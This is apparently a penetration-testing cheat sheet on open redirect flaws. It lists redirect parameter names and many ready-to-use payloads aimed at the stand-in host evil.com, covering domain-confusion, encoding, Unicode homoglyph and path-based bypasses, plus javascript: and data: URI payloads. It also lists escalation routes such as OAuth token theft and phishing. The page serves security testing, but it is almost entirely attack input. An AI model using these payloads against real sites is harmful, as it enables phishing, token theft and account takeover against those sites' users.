Skip to content
Web Security

Open Redirect

Open redirect vulnerabilities and bypass techniques

Common Parameters

TEXT 
?url=
?redirect=
?next=
?dest=
?destination=
?redir=
?redirect_uri=
?return=
?return_to=
?returnTo=
?go=
?goto=
?link=
?target=
?out=
?continue=
?view=
?image_url=
?checkout_url=

Basic Payloads

TEXT 
https://evil.com
//evil.com
/\evil.com
\/evil.com

Bypass Techniques

Domain Confusion

TEXT 
https://target.com@evil.com
https://evil.com#@target.com
https://evil.com\@target.com
https://target.com.evil.com

Protocol Bypass

TEXT 
//evil.com
///evil.com
////evil.com
/\/evil.com

Encoding

TEXT 
https://evil.com%00.target.com
https://evil.com%20.target.com
https://evil%2Ecom
%68%74%74%70%3a%2f%2f%65%76%69%6c%2e%63%6f%6d

Unicode/Special Characters

TEXT 
https://evil.com%E3%80%82target.com
https://evil。com
https://evіl.com  (Cyrillic і)

Path-Based

TEXT 
/https://evil.com
///evil.com/../../
/redirect/https://evil.com

JavaScript Redirect

TEXT 
javascript:alert(document.domain)//
data:text/html,<script>document.location='https://evil.com'</script>

Impact Escalation

TEXT 
1. Phishing - redirect to lookalike domain
2. OAuth token theft - redirect_uri manipulation
3. SSO bypass
4. Chain with XSS

Testing Checklist

TEXT 
□ Identify redirect parameters
□ Test external domain
□ Try bypass techniques
□ Test encoding variations
□ Check for JavaScript protocol
□ Document for OAuth chaining
Back to Cheatsheets
On this page